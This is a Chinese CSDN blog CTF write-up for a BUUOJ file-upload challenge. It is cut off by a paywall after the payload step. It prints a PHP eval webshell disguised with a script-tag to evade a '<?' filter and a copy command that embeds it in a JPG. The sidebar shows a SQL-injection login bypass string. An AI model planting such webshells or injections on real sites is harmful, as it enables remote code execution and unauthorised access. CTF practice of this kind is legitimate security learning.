2021-06-18 CTF Webbuuoj day14

最新推荐文章于 2022-09-04 14:57:19 发布
最新推荐文章于 2022-09-04 14:57:19 发布
阅读量528 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LiNa_lInA_741/article/details/118019106
版权
本文详细介绍了多个CTF挑战的解题过程,包括极客大挑战的Upload(利用图片马绕过过滤)和BabySQL(SQL注入),ACTF新生赛的BackupFile(信息泄露),HCTF的admin(Flask session伪造),以及BuyFlag和Easy MD5(涉及PHP函数的漏洞利用)。每个挑战都涵盖了不同的安全知识点和技术利用技巧。
摘要由CSDN通过智能技术生成

CTF Web buu oj day14

[极客大挑战 2019]Upload

类型

文件上传

解题

第一种方法,通过做图片马:

  1. burp打开页面,title=上传头像:
    上传头像
  2. 上传一个图片吧,1.png,提交后提示Not image!看来这个图片格式不行
    png
  3. 上传另一个格式的1.jpg,提交后提示NO! HACKER! your file included ‘<?’,看来这个图片有<?被检测到,Editor010打开图片找到<?去掉后上传成功
    <?检测
    上传图片成功
  4. 尝试通过url/uploads/1.jpg、url/upload/1.jpg访问,可以看到刚刚上传的图片1.jpg
    查看
  5. 接下来做图片马,通过1.jpg上传知道过滤<?,所以一句话木马要绕过这个检测:
<script language="php">@eval($_POST[666])</script>

把这个一句话放到2.php里,然后通过命令合成:

copy 1.jpg/b+2.php/a 999.jpg

做图片马

最低0.47元/天 解锁文章
LiNa_lInA_741
关注
专栏目录
ctf赛题secret.php,BUUCTF web 刷几道菜鸡能做的题
weixin_34553878的博客
03-12 670
[WUSTCTF2020]CV Maker(文件上传)1、注册,登录,上传图片,用bp抓包后将filename后缀改为php,连上蚁剑。[极客大挑战 2019]Havefun(简朴代码审计)[极客大挑战 2019]Knife1、直接连上蚁剑。果真白给的shell。[极客大挑战 2019]EasySQL(万能密码)username=’admin’or 1=1#’ and password=’随便写...
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
热门推荐
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
[GXYCTF2019]BabyUpload(典型图片基础绕过流程)
EC_Carrot的博客
11-05 2297
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! [GXYCTF2019]BabyUpload 这题坑了我一小会,我就在想这都能坑到我,真的是太年轻了(`-д-;)ゞ 试了一下gif,jpg用不了,png是可以的 上传php提示不能上传后缀名带ph的文件 再测试上传.htaccess文件 发现改type为image/jpeg能上传成功 到这里不难猜出是图片getshell了 拿蚁剑连拿fla
BUUOJ-web刷题wp(二)
Theseus_sky的博客
07-16 757
特辑篇-极客大挑战2019 [极客大挑战 2019]EasySQL 万能密码如下:直接登录显示flag [极客大挑战 2019]Havefun F12看一下,发现那串注释,尝试get数据?cat=dog y1s1,这猫还是很可爱的,下面的有道题也是!!玩了半天哈哈哈 [极客大挑战 2019]Secret File 查看源代码,发现Archive.room.php,打开看看 按一下按钮 可能是跳转太快了,抓一下包。 发现提示,进入 又现提示flag.php,进入看看 网页源代码看不见,猜测是写
逆向第一课(简单的password程序修改逻辑)
jiyi_guoshu的博客
03-14 555
password源码如下: #include &lt;iostream&gt; #include&lt;string.h&gt; using namespace std; #define password "12345678" bool verifyPwd(char * pwd) { int flag; flag=strcmp(password, pwd); return flag==0...
*CTF 2022web(CVE-2021-43798)
……
09-04 1490
CVE-2021-43798漏洞复现 *CTF 2022web
2021-02-18-ctf-坚持60s-反编译
Be Smart
03-22 4570
layout: post title: “ctf-坚持60s” categories: [ctf] tags: [反编译] 反编译: 反编译做的就是编译的相反动作。举例说,例如一个程序用C语言写,写完之后要编译成CPU可以识别和运行的机器代码,也就是生成EXE程序。而反编译是反过来,把EXE反编译成编程源代码,也就是C程序,不过一般反编译大多数都是从机器码反编译为汇编。其他语言的情况基本也是这样的。至于具体要怎么用,这个就看你的目的了。但一般情况下是通过反编译主要是用于没有源码的程序的分析,例如破解别人.
2021-02-18-ctf-gif转二进制
Be Smart
03-22 7361
layout: post title: “ctf-gif转二进制” categories: [ctf] tags: [ctf] [目标] 简单密码学 [环境] windows [工具] 转换二进制为字符串工具 [分析过程] 打开文件出现多个黑白,让人联想到二进制,白色图片代表0,黑色图片代表1。 01100110前八位二进制换算后为 f 证明思路正确。 011001100110110001100001011001110111101101000110011101010100111001011111011.
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-misc工具2-CTF-Tools-masterV1.3.7
最新发布
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
21t2-secsoc-x-csesoc-newbie-ctf:2021 T2 SecSoc x CSESoc 合作 CTF
08-04
2021 SecSoc x CSESoc Newbie CTF 中挑战的存储库,其中包含大多数挑战的文章和源代码,以便您可以自己运行它。 想要提交您自己的社区文章以应对挑战(即使是已经有文章的人)? 提出拉取请求! 我们喜欢看到解决...
2021-07-28 CTF Webbuuoj [网鼎杯 2020 半决赛]faka
LiNa_lInA_741的博客
07-28 982
CTF Web buu oj[网鼎杯 2020 半决赛]faka解题 [网鼎杯 2020 半决赛]faka 解题 不会写网站,做不了代码审计,就记录别人WP的解题思路,再回头来看 下载网站源代码,html/applilcation/admin,网站打开admin,跳到管理后台登录页面。 目录文件中有tk.sql文件,phpmyadmin先创建数据库,再导入tk.sql。 数据库打开表system_user,找到admin/md5后得密码 md5解密得到admin密码admincccbbb123 登
2021-04-26 CTF Misc buu oj day3 7道题
LiNa_lInA_741的博客
04-26 1498
这里写目录标题乌镇峰会种图类型图片文件解题LSB类型图片文件LSB隐写解题文件中的秘密类型图片文件解题标题 乌镇峰会种图 类型 Misc jpg图片分析 图片文件 b56cde4f-be03-4d07-a0ca-6af22284f0aa.jpg 解题 复习题,同day2里面你竟然赶我走biubiu.jpg,flag:flag{97314e7864a8f62627b26f3f998c37f1} LSB 类型 Misc png图片分析 图片文件 flag11.png LSB隐写 这里是引用 LSB全称Le
2021-04-27 CTF Misc buu oj day4 7道题
LiNa_lInA_741的博客
04-27 1346
这里写目录标题ningen类型图片文件解题镜子里面的世界类型图片文件解题被嗅探的流量类型pcap文件解题小明的保险箱类型图片文件解题爱因斯坦类型图片文件解题easycap类型图片文件解题另外一个世界类型图片文件解题ASCII编码变形 ningen 类型 Misc jpg图片分析 图片文件 9e3ec8c2-38c7-41cf-b5d7-abe7872de4c3.jpg 解题 复习题,类似day1里面二维码。 常规检查,打开图片看看,打开属性看看,用010Editor打开看看,发现图片隐藏文件: binw
2021-05-6 CTF Misc buu oj day7 6道题
LiNa_lInA_741的博客
05-06 978
这里写目录标题九连环类型图片文件解题标题 九连环 类型 jpg图片分析 图片文件 123456cry.jpg 解题 据说是伪加密(文件目录加密而全局目录未加密),但是经过基础检查,用binwalk分析是可以zip文件的: 解压后的文件又看到一个图片和一个加密的zip压缩包,压缩包里面和asd文件夹里一样,都是一张图片“good-已合并.jpg”和一个带flag.txt的“qwe”压缩包: 基础检查“good-已合并.jpg”并未发现异常,这里下载了一个新的隐写查看工具steghide,看一下stegh
2021-05-13 CTF Misc buu oj day9 5道题
LiNa_lInA_741的博客
05-13 873
菜刀666 类型 流量包分析 流量包 666666.pcapng 解题 流量包wireshark打开后基础分析: 统计-协议分级: Conversation统计: HTTP分组计数: 请求统计: 发现http请求,上传1.php,分析为可以数据包,过滤ip.addr==192.168.43.83 and http,很多请求: 打开看每个请求都是base64编码的命令 用命令导出tshark -r 666666.pcapng -T fields -e urlen
2021-04-30 CTF Misc buu oj day6 5道题
LiNa_lInA_741的博客
05-02 672
这里写目录标题神秘龙卷风类型压缩包文件解题 神秘龙卷风 类型 rar压缩包分析、编码分析 压缩包文件 神秘龙卷风.rar 解题 rar压缩包加密4位密码用ARCHPR直接爆破:5463 里面txt文件打开是+.>组成,数了一下到第一个.>的+数量,是102,对着ASCII编码表看了一眼对应字母“f”,于是猜测后面应该都这样就能编码出flag{}(后证实这纯属瞎猜)。 看其他解法发现是Brainfuck编码,+表示指针指向字节加一,.表示输出指针指向内容,>表示指针加一。Brainfu
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值